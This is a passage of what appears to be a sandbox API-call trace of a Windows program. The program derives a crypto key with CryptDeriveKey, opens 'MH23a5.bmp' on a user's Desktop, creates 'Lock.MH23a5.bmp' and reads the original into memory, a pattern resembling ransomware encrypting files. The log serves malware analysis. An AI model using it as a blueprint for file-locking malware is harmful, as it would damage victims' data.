cchWideChar=4, lpMultiByteStr=0x2a71af8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0103.244] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.244] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.244] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.244] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.244] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.244] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.244] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0103.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9ec8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0103.244] CryptHashData (hHash=0x9a3b80, pbData=0x2a718f8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0103.244] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.244] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.244] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.244] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.244] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.244] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.244] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.244] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.244] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0103.245] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.245] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0103.245] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.245] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0103.245] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0103.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9d30, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0103.245] CryptDeriveKey (in: hProv=0x9bf6e8, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4580) returned 1 [0103.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.245] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.300] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.300] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.300] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0103.300] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.300] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0103.300] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0103.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0103.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0103.300] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0103.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0103.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0103.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0103.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0103.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0103.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0103.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0103.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0103.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0103.300] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0103.301] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0103.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0103.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0103.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0103.301] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0103.301] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.301] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.301] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0103.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0103.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0103.301] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.302] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/MH23a5.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\mh23a5.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0103.302] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.302] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0103.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0103.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0103.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0103.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0103.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0103.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0103.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0103.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75a38 [0103.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.303] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0103.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75a38 | out: hHeap=0x2af0000) returned 1 [0103.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0103.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0103.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0103.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0103.304] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.MH23a5.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.mh23a5.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0103.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0103.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0103.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0103.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.304] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0103.304] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0103.304] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0103.305] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0103.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0103.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0103.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0103.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.305] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0103.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cac020 [0103.308] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0103.308] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x80c1, lpOverlapped=0x0) returned 1 [0103.310] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0103.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80c1) returned 0x2a7a130 [0103.310] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cac020 | out: hHeap=0x2af0000) returned 1 [0103.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0103.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0103.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0103.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0103.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0103.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0103.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80c1) returned 0x2a82200 [0103.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0103.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.314] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0103.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80c1) returned 0x2a7a130 [0103.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0103.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0103.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0103.314] 